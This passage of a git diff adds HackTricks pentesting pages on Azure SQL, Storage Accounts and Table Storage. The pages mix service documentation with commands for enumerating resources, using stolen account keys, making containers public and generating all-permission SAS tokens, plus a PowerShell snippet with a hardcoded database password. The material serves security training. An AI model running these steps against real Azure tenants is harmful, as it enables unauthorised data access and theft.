+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../az-post-exploitation/az-servicebus-post-exploitation.md" %}
+[az-servicebus-post-exploitation.md](../az-post-exploitation/az-servicebus-post-exploitation.md)
+{% endcontent-ref %}
+
+## References
+
+* https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0
+* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview
+* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-sql.md b/pentesting-cloud/azure-security/az-services/az-sql.md
new file mode 100644
index 0000000000..cf63f9c56b
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-sql.md
@@ -0,0 +1,86 @@
+# Az - SQL
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview) Azure SQL is a family of managed, secure, and intelligent products that use the **SQL Server database engine in the Azure cloud**. This means you don't have to worry about the physical administration of your servers, and you can focus on managing your data.
+
+Azure SQL consists of three main offerings:
+
+1. **Azure SQL Database**: This is a **fully-managed database service**, which allows you to host individual databases in the Azure cloud. It offers built-in intelligence that learns your unique database patterns and provides customized recommendations and automatic tuning.
+2. **Azure SQL Managed Instance**: This is for larger scale, entire SQL Server instance-scoped deployments. It provides near 100% compatibility with the latest SQL Server on-premises (Enterprise Edition) Database Engine, which provides a native virtual network (VNet) implementation that addresses common security concerns, and a business model favorable for on-premises SQL Server customers.
+3. **Azure SQL Server on Azure VMs**: This is Infrastructure as a Service (IaaS) and is best for migrations where you want **control over the operating system and SQL Server instance**, like it was a server running on-premises.
+
+## Enumeration
+
+```bash
+az sql server list
+az sql server show --resource-group <res-grp> --name <name>
+az sql db list --server <server> --resource-group <res-grp>
+
+az sql mi list
+az sql mi show --resource-group <res-grp> --name <name>
+az sql midb list
+az sql midb show --resource-group <res-grp> --name <name>
+
+az sql vm list
+az sql vm show --resource-group <res-grp> --name <name>
+```
+
+### Connect and run SQL queries
+
+You could find a connection string (containing credentials) from example [enumerating an Az WebApp](az-azure-app-service.md):
+
+{% code overflow="wrap" %}
+```powershell
+function invoke-sql{
+    param($query)
+    $Connection_string = "Server=tcp:supercorp.database.windows.net,1433;Initial Catalog=flag;Persist Security Info=False;User ID=db_read;Password=gAegH!324fAG!#1fht;MultipleActiveResultSets=False;Encrypt=True;TrustServerCertificate=False;Connection Timeout=30;"
+    $Connection = New-Object System.Data.SqlClient.SqlConnection $Connection_string
+    $Connection.Open()
+    $Command = New-Object System.Data.SqlClient.SqlCommand
+    $Command.Connection = $Connection
+    $Command.CommandText = $query
+    $Reader = $Command.ExecuteReader()
+    while ($Reader.Read()) {
+        $Reader.GetValue(0)
+    }
+    $Connection.Close()
+}
+
+invoke-sql 'Select Distinct TABLE_NAME From information_schema.TABLES;'
+```
+{% endcode %}
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-storage.md b/pentesting-cloud/azure-security/az-services/az-storage.md
new file mode 100644
index 0000000000..9a26f4fbf5
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-storage.md
@@ -0,0 +1,465 @@
+# Az - Storage Accounts & Blobs
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Azure Storage Accounts are fundamental services in Microsoft Azure that provide scalable, secure, and highly available cloud **storage for various data types**, including blobs (binary large objects), files, queues, and tables. They serve as containers that group these different storage services together under a single namespace for easy management.
+
+**Main configuration options**:
+
+* Every storage account must have a **uniq name across all Azure**.
+* Every storage account is deployed in a **region** or in an Azure extended zone
+* It's possible to select the **premium** version of the storage account for better performance
+* It's possible to select among **4 types of redundancy to protect** against rack, drive and datacenter **failures**.
+
+**Security configuration options**:
+
+* **Require secure transfer for REST API operations**: Require TLS in any communication with the storage
+* **Allows enabling anonymous access on individual containers**: If not, it won't be possible to enable anonymous access in the future
+* **Enable storage account key access**: If not, access with Shared Keys will be forbidden
+* **Minimum TLS version**
+* **Permitted scope for copy operations**: Allow from any storage account, from any storage account from the same Entra tenant or from storage account with private endpoints in the same virtual network.
+
+**Blob Storage options**:
+
+* **Allow cross-tenant replication**
+* **Access tier**: Hot (frequently access data), Cool and Cold (rarely accessed data)
+
+**Networking options**:
+
+* **Network access**:
+  * Allow from all networks
+  * Allow from selected virtual networks and IP addresses
+  * Disable public access and use private access
+* **Private endpoints**: It allows a private connection to the storage account from a virtual network
+
+**Data protection options**:
+
+* **Point-in-time restore for containers**: Allows to restore containers to an earlier state
+  * It requires versioning, change feed, and blob soft delete to be enabled.
+* **Enable soft delete for blobs**: It enables a retention period in days for deleted blobs (even overwritten)
+* **Enable soft delete for containers**: It enables a retention period in days for deleted containers
+* **Enable soft delete for file shares**: It enables a retention period in days for deleted file shared
+* **Enable versioning for blobs**: Maintain previous versions of your blobs
+* **Enable blob change feed**: Keep logs of create, modification, and delete changes to blobs
+* **Enable version-level immutability support**: Allows you to set time-based retention policy on the account-level that will apply to all blob versions.
+  * Version-level immutability support and point-in-time restore for containers cannot be enabled simultaneously.
+
+**Encryption configuration options**:
+
+* **Encryption type**: It's possible to use Microsoft-managed keys (MMK) or Customer-managed keys (CMK)
+* **Enable infrastructure encryption**: Allows to double encrypt the data "for more security"
+
+### Storage endpoints
+
+<table data-header-hidden><thead><tr><th width="197">Storage Service</th><th>Endpoint</th></tr></thead><tbody><tr><td><strong>Blob storage</strong></td><td><code>https://&#x3C;storage-account>.blob.core.windows.net</code><br><br><code>https://&#x3C;stg-acc>.blob.core.windows.net/&#x3C;container-name>?restype=container&#x26;comp=list</code></td></tr><tr><td><strong>Data Lake Storage</strong></td><td><code>https://&#x3C;storage-account>.dfs.core.windows.net</code></td></tr><tr><td><strong>Azure Files</strong></td><td><code>https://&#x3C;storage-account>.file.core.windows.net</code></td></tr><tr><td><strong>Queue storage</strong></td><td><code>https://&#x3C;storage-account>.queue.core.windows.net</code></td></tr><tr><td><strong>Table storage</strong></td><td><code>https://&#x3C;storage-account>.table.core.windows.net</code></td></tr></tbody></table>
+
+### Public Exposure
+
+If "Allow Blob public access" is **enabled** (disabled by default), when creating a container it's possible to:
+
+* Give **public access to read blobs** (you need to know the name).
+* **List container blobs** and **read** them.
+* Make it fully **private**
+
+<figure><img src="https://lh7-rt.googleusercontent.com/slidesz/AGV_vUfoetUnYBPWQpRrWNnnlbqWpl8Rdoaeg5uBrCVlvcNDlnKwQHjZe8nUb2SfPspBgbu-lCZLmUei-hFi_Jl2eKbaxUtBGTjdUSDmkrcwr90VZkmuMjk9tyh92p75btfyzGiUTa0-=s2048?key=m8TV59TrCFPlkiNnmhYx3aZt" alt=""><figcaption></figcaption></figure>
+
+### Connect to Storage
+
+If you find any **storage** you can connect to you could use the tool [**Microsoft Azure Storage Explorer**](https://azure.microsoft.com/es-es/products/storage/storage-explorer/) to do so.
+
+## Access to Storage <a href="#about-blob-storage" id="about-blob-storage"></a>
+
+### RBAC
+
+It's possible to use Entra ID principals with **RBAC roles** to access storage accounts and it's the recommended way.
+
+### Access Keys
+
+The storage accounts have access keys that can be used to access it. This provides f**ull access to the storage account.**
+
+<figure><img src="../../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
+
+### **Shared Keys & Lite Shared Keys**
+
+It's possible to [**generate Shared Keys**](https://learn.microsoft.com/en-us/rest/api/storageservices/authorize-with-shared-key) signed with the access keys to authorize access to certain resources via a signed URL.
+
+{% hint style="info" %}
+Note that the `CanonicalizedResource` part represents the storage services resource (URI). And if any part in the URL is encoded, it should also be encoded inside the `CanonicalizedResource`.
+{% endhint %}
+
+{% hint style="info" %}
+This is **used by default by `az` cli** to authenticate requests. To make it use the Entra ID principal credentials indicate the param `--auth-mode login`.
+{% endhint %}
+
+* It's possible to generate a **shared key for blob, queue and file services** signing the following information:
+
+```bash
+StringToSign = VERB + "\n" +  
+               Content-Encoding + "\n" +  
+               Content-Language + "\n" +  
+               Content-Length + "\n" +  
+               Content-MD5 + "\n" +  
+               Content-Type + "\n" +  
+               Date + "\n" +  
+               If-Modified-Since + "\n" +  
+               If-Match + "\n" +  
+               If-None-Match + "\n" +  
+               If-Unmodified-Since + "\n" +  
+               Range + "\n" +  
+               CanonicalizedHeaders +   
+               CanonicalizedResource;
+```
+
+* It's possible to generate a **shared key for table services** signing the following information:
+
+```bash
+StringToSign = VERB + "\n" +
+               Content-MD5 + "\n" +
+               Content-Type + "\n" +  
+               Date + "\n" +  
+               CanonicalizedResource;
+```
+
+* It's possible to generate a **lite shared key for blob, queue and file services** signing the following information:
+
+```bash
+StringToSign = VERB + "\n" +  
+               Content-MD5 + "\n" +  
+               Content-Type + "\n" +  
+               Date + "\n" +  
+               CanonicalizedHeaders +   
+               CanonicalizedResource;
+```
+
+* It's possible to generate a **lite shared key for table services** signing the following information:
+
+```bash
+StringToSign = Date + "\n"
+               CanonicalizedResource
+```
+
+Then, to use the key, it can be done in the Authorization header following the syntax:
+
+```bash
+Authorization="[SharedKey|SharedKeyLite] <AccountName>:<Signature>"
+#e.g.
+Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
+
+PUT http://myaccount/mycontainer?restype=container&timeout=30 HTTP/1.1 
+ x-ms-version: 2014-02-14 
+ x-ms-date: Fri, 26 Jun 2015 23:39:12 GMT 
+ Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08= 
+ Content-Length: 0
+```
+
+### **Shared Access Signature** (SAS)
+
+Shared Access Signatures (SAS) are secure, time-limited URLs that **grant specific permissions to access resource**s in an Azure Storage account without exposing the account's access keys. While access keys provide full administrative access to all resources, SAS allows for granular control by specifying permissions (like read or write) and defining an expiration time.
+
+#### SAS Types
+
+* **User delegation SAS**: This is created from an **Entra ID principal** which will sign the SAS and delegate the permissions from the user to the SAS. It can only be used with **blob and data lake storage** ([docs](https://learn.microsoft.com/en-us/rest/api/storageservices/create-user-delegation-sas)). It's possible to **revoke** all generated user delegated SAS.
+  * Even if it's possible to generate a delegation SAS with "more" permissions than the ones the user has. However, if the principal doesn't have them, it won't work (no privesc).
+* **Service SAS**: This is signed using one of the storage account **access keys**. It can be used to grant access to specific resources in a single storage service. If the key is renewed, the SAS will stop working.
+* **Account SAS**: It's also signed with one of the storage account **access keys**. It grants access to resources across a storage account services (Blob, Queue, Table, File) and can include service-level operations.
+
+A SAS URL signed by an **access key** looks like this:
+
+* `https://<container_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
+
+A SAS URL signed as a **user delegation** looks like this:
+
+* `https://<container_name>.blob.core.windows.net/testing-container?sp=r&st=2024-11-22T15:07:40Z&se=2024-11-22T23:07:40Z&skoid=d77c71a1-96e7-483d-bd51-bd753aa66e62&sktid=fdd066e1-ee37-49bc-b08f-d0e152119b04&skt=2024-11-22T15:07:40Z&ske=2024-11-22T23:07:40Z&sks=b&skv=2022-11-02&spr=https&sv=2022-11-02&sr=c&sig=7s5dJyeE6klUNRulUj9TNL0tMj2K7mtxyRc97xbYDqs%3D`
+
+Note some **http params**:
+
+* The **`se`** param indicates the **expiration date** of the SAS
+* The **`sp`** param indicates the **permissions** of the SAS
+* The **`sig`** is the **signature** validating the SAS
+
+#### SAS permissions
+
+When generating a SAS it's needed to indicate the permissions that it should be granting. Depending on the objet the SAS is being generated over different permissions might be included. For example:
+
+* (a)dd, (c)reate, (d)elete, (e)xecute, (f)ilter\_by\_tags, (i)set\_immutability\_policy, (l)ist, (m)ove, (r)ead, (t)ag, (w)rite, (x)delete\_previous\_version, (y)permanent\_delete
+
+## SFTP Support for Azure Blob Storage
+
+Azure Blob Storage now supports the SSH File Transfer Protocol (SFTP), enabling secure file transfer and management directly to Blob Storage without requiring custom solutions or third-party products.
+
+### Key Features
+
+- Protocol Support: SFTP works with Blob Storage accounts configured with hierarchical namespace (HNS). This organizes blobs into directories and subdirectories for easier navigation.
+- Security: SFTP uses local user identities for authentication and does not integrate with RBAC or ABAC. Each local user can authenticate via:
+    - Azure-generated passwords
+    - Public-private SSH key pairs
+- Granular Permissions: Permissions such as Read, Write, Delete, and List can be assigned to local users for up to 100 containers.
+- Networking Considerations: SFTP connections are made through port 22. Azure supports network configurations like firewalls, private endpoints, or virtual networks to secure SFTP traffic.
+
+### Setup Requirements
+
+- Hierarchical Namespace: HNS must be enabled when creating the storage account.
+- Supported Encryption: Requires Microsoft Security Development Lifecycle (SDL)-approved cryptographic algorithms (e.g., rsa-sha2-256, ecdsa-sha2-nistp256).
+- SFTP Configuration:
+    - Enable SFTP on the storage account.
+    - Create local user identities with appropriate permissions.
+    - Configure home directories for users to define their starting location within the container.
+
+### Permissions
+
+| Permission       | Symbol | Description                                |
+|-------------------|--------|--------------------------------------------|
+| **Read**         | `r`    | Read file content.                         |
+| **Write**        | `w`    | Upload files and create directories.       |
+| **List**         | `l`    | List contents of directories.              |
+| **Delete**       | `d`    | Delete files or directories.               |
+| **Create**       | `c`    | Create files or directories.               |
+| **Modify Ownership** | `o` | Change the owning user or group.           |
+| **Modify Permissions** | `p` | Change ACLs on files or directories.      |
+
+## Enumeration
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
+```bash
+# Get storage accounts
+az storage account list #Get the account name from here
+
+# BLOB STORAGE
+## List containers
+az storage container list --account-name <name>
+## Check if public access is allowed
+az storage container show-permission \
+  --account-name <acc-name> \
+  -n <container-name>
+## Make a container public
+az storage container set-permission \
+  --public-access container \
+  --account-name <acc-name> \
+  -n <container-name>
+## List blobs in a container
+az storage blob list \
+  --container-name <container name> \
+  --account-name <account name>
+## Download blob
+az storage blob download \
+  --account-name <account name> \
+  --container-name <container name> \
+  --name <blob name> \
+  --file </path/to/local/file>
+## Create container policy
+az storage container policy create \
+  --account-name mystorageaccount \
+  --container-name mycontainer \
+  --name fullaccesspolicy \
+  --permissions racwdl \
+  --start 2023-11-22T00:00Z \
+  --expiry 2024-11-22T00:00Z
+
+# QUEUE
+az storage queue list --account-name <name>
+az storage message peek --account-name <name> --queue-name <queue-name>
+
+# ACCESS KEYS
+az storage account keys list --account-name <name>
+## Check key policies (expiration time?)
+az storage account show -n <name> --query "{KeyPolicy:keyPolicy}"
+## Once having the key, it's possible to use it with the argument --account-key
+## Enum blobs with account key
+az storage blob list \
+  --container-name <container name> \
+  --account-name <account name> \
+  --account-key "ZrF40pkVKvWPUr[...]v7LZw=="
+## Download a file using an account key
+az storage blob download \
+  --account-name <account name> \
+  --account-key "ZrF40pkVKvWPUr[...]v7LZw==" \
+  --container-name <container name> \
+  --name <blob name> \
+  --file </path/to/local/file>
+## Upload a file using an account key
+az storage blob upload \
+  --account-name <account name> \
+  --account-key "ZrF40pkVKvWPUr[...]v7LZw==" \
+  --container-name <container name> \
+  --file </path/to/local/file>
+
+# SAS
+## List access policies
+az storage <container|queue|share|table> policy list \
+  --account-name <acc name> \
+  --container-name <container name>
+
+## Generate SAS with all permissions using an access key
+az storage <container|queue|share|table|blob> generate-sas \
+  --permissions acdefilmrtwxy \
+   --expiry 2024-12-31T23:59:00Z \
+  --account-name <acc-name> \
+  -n <container-name>
+
+## Generate SAS with all permissions using via user delegation
+az storage <container|queue|share|table|blob> generate-sas \
+  --permissions acdefilmrtwxy \
+  --expiry 2024-12-31T23:59:00Z \
+  --account-name <acc-name> \
+  --as-user --auth-mode login \
+  -n <container-name>
+  
+## Generate account SAS
+az storage account generate-sas \
+  --expiry 2024-12-31T23:59:00Z \
+  --account-name <acc-name>  \
+  --services qt \
+  --resource-types sco \
+  --permissions acdfilrtuwxy
+
+## Use the returned SAS key with the param --sas-token
+## e.g.
+az storage blob show \
+  --account-name <account name> \
+  --container-name <container name> \
+  --sas-token 'se=2024-12-31T23%3A59%3A00Z&sp=racwdxyltfmei&sv=2022-11-02&sr=c&sig=ym%2Bu%2BQp5qqrPotIK5/rrm7EMMxZRwF/hMWLfK1VWy6E%3D' \
+  --name 'asd.txt'
+
+#Local-Users
+## List users
+az storage account local-user list \
+  --account-name <storage-account-name> \
+  --resource-group <resource-group-name>
+## Get user
+az storage account local-user show \
+  --account-name <storage-account-name> \
+  --resource-group <resource-group-name> \
+  --name <local-user-name>
+
+## List keys
+az storage account local-user list \
+  --account-name <storage-account-name> \
+  --resource-group <resource-group-name>
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+# Get storage accounts
+Get-AzStorageAccount | fl
+# Get rules to access the storage account
+Get-AzStorageAccount | select -ExpandProperty NetworkRuleSet
+# Get IPs
+(Get-AzStorageAccount | select -ExpandProperty NetworkRuleSet).IPRules
+# Get containers of a storage account
+Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
+# Get blobs inside container
+Get-AzStorageBlob -Container epbackup-planetary -Context (Get-AzStorageAccount -name <name> -ResourceGroupName <name>).context
+# Get a blob from a container
+Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob <blob_name> -Destination .\Desktop\filename.txt
+
+# Create a Container Policy
+New-AzStorageContainerStoredAccessPolicy `
+  -Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context `
+  -Container <container-name> `
+  -Policy <policy-name> `
+  -Permission racwdl `
+  -StartTime (Get-Date "2023-11-22T00:00Z") `
+  -ExpiryTime (Get-Date "2024-11-22T00:00Z")
+#Get Container policy
+Get-AzStorageContainerStoredAccessPolicy `
+  -Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context `
+  -Container "storageaccount1994container"
+
+# Queue Management
+Get-AzStorageQueue -Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context
+(Get-AzStorageQueue -Name <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).Context).QueueClient.PeekMessage().Value
+
+#Blob Container
+Get-AzStorageBlob -Container <container-name> -Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
+Get-AzStorageBlobContent `
+  -Container <container-name> `
+  -Blob <blob-name> `
+  -Destination <local-path> `
+  -Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
+
+Set-AzStorageBlobContent `
+  -Container <container-name> `
+  -File <local-file-path> `
+  -Blob <blob-name> `
+  -Context $(Get-AzStorageAccount -name "teststorageaccount1998az" -ResourceGroupName "testStorageGroup").Context
+
+# Shared Access Signatures (SAS)
+Get-AzStorageContainerAcl `
+  -Container <container-name> `
+  -Context (Get-AzStorageAccount -Name <NAME> -ResourceGroupName <NAME>).Context
+
+New-AzStorageBlobSASToken `
+  -Context $ctx `
+  -Container <container-name> `
+  -Blob <blob-name> `
+  -Permission racwdl `
+  -ExpiryTime (Get-Date "2024-12-31T23:59:00Z")
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+### File Shares
+
+{% content-ref url="az-file-shares.md" %}
+[az-file-shares.md](az-file-shares.md)
+{% endcontent-ref %}
+
+## Privilege Escalation
+
+{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %}
+[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../az-post-exploitation/az-blob-storage-post-exploitation.md" %}
+[az-blob-storage-post-exploitation.md](../az-post-exploitation/az-blob-storage-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+{% content-ref url="../az-persistence/az-storage-persistence.md" %}
+[az-storage-persistence.md](../az-persistence/az-storage-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction)
+* [https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview](https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview)
+* [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-table-storage.md b/pentesting-cloud/azure-security/az-services/az-table-storage.md
new file mode 100644
index 0000000000..5290fdcdef
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-table-storage.md
@@ -0,0 +1,120 @@
+# Az - Table Storage
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications.
+
+There **isn't built-in backup mechanism** for table storage.
+
+### Keys
+
+#### **PartitionKey**
+
+* The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability.
+* Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`.
+
+#### **RowKey**
+
+* The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier.
+* Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`.
+
+#### **Other Properties (Custom Properties)**
+
+* Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database.
+* Properties are stored as **key-value pairs**.
+* Example: `Name`, `Age`, `Title` could be custom properties for an employee.
+
+## Enumeration
+
+```bash
+# Get storage accounts
+az storage account list
+
+# List tables
+az storage table list --account-name <name>
+
+# Read table
+az storage entity query \
+  --account-name <name> \
+  --table-name <t-name> \
+  --top 10
+  
+# Write table
+az storage entity insert \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --table-name <TABLE_NAME> \
+  --entity PartitionKey=<PARTITION_KEY> RowKey=<ROW_KEY> <PROPERTY_KEY>=<PROPERTY_VALUE>
+
+# Write example
+az storage entity insert \
+  --account-name mystorageaccount \
+  --table-name mytable \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Update row
+az storage entity merge \
+  --account-name mystorageaccount \
+  --table-name mytable \
+  --entity PartitionKey=pk1 RowKey=rk1 Age=31
+```
+
+{% hint style="info" %}
+By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`.
+{% endhint %}
+
+{% hint style="success" %}
+Use the param `--account-key` to indicate the account key to use\
+Use the param `--sas-token` with the SAS token to access via a SAS token
+{% endhint %}
+
+## Privilege Escalation
+
+Same as storage privesc:
+
+{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %}
+[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../az-post-exploitation/az-table-storage-post-exploitation.md" %}
+[az-table-storage-post-exploitation.md](../az-post-exploitation/az-table-storage-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+Same as storage persistence:
+
